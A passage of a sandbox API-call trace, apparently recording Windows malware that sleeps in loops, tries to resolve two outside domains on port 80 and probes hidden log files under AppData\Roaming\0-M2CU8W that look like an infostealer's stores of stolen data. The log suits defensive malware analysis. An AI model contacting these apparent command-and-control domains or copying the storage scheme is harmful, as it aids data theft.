(dwMilliseconds=0x7d0) [0196.860] Sleep (dwMilliseconds=0x7d0) [0196.907] Sleep (dwMilliseconds=0x7d0) [0196.928] Sleep (dwMilliseconds=0x7d0) [0196.969] socket (af=2, type=1, protocol=6) returned 0xb0c [0196.994] getaddrinfo (in: pNodeName="www.investotbank.com", pServiceName="80", pHints=0x6f0b418*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b448 | out: ppResult=0x6f0b448*=0x0) returned 11001 [0197.281] Sleep (dwMilliseconds=0x7d0) [0197.298] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.298] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.298] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0197.298] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.298] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.298] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.298] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.298] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.298] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.299] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.299] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.299] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.299] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.299] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.299] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.299] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.299] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.299] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.299] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.299] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.299] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.300] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.300] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.300] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.300] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.300] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.300] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.300] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.300] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.300] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.300] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.300] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.300] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.300] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.300] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0197.301] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.301] Sleep (dwMilliseconds=0x7d0) [0197.315] Sleep (dwMilliseconds=0x7d0) [0197.340] Sleep (dwMilliseconds=0x7d0) [0197.347] Sleep (dwMilliseconds=0x7d0) [0197.359] Sleep (dwMilliseconds=0x7d0) [0197.375] Sleep (dwMilliseconds=0x7d0) [0197.390] Sleep (dwMilliseconds=0x7d0) [0197.411] Sleep (dwMilliseconds=0x7d0) [0197.421] Sleep (dwMilliseconds=0x7d0) [0197.468] Sleep (dwMilliseconds=0x7d0) [0197.484] Sleep (dwMilliseconds=0x7d0) [0197.499] Sleep (dwMilliseconds=0x7d0) [0197.516] Sleep (dwMilliseconds=0x7d0) [0197.531] Sleep (dwMilliseconds=0x7d0) [0197.550] Sleep (dwMilliseconds=0x7d0) [0197.562] Sleep (dwMilliseconds=0x7d0) [0197.582] Sleep (dwMilliseconds=0x7d0) [0197.593] Sleep (dwMilliseconds=0x7d0) [0197.609] Sleep (dwMilliseconds=0x7d0) [0197.625] socket (af=2, type=1, protocol=6) returned 0xab8 [0197.626] getaddrinfo (in: pNodeName="www.handelsbetriebposavec.com", pServiceName="80", pHints=0x6f0b7b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b7e8 | out: ppResult=0x6f0b7e8*=0x0) returned 11001 [0197.637] Sleep (dwMilliseconds=0x7d0) [0197.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.646] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.646] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0197.646] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.646] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.646] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.646] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.646] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.646] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.646] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.646] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.647] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.647] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.647] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.647] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.647] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.647] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.647] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.647] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.647] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.647] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.647] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.647] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.647] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.647] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.648] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.648] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: 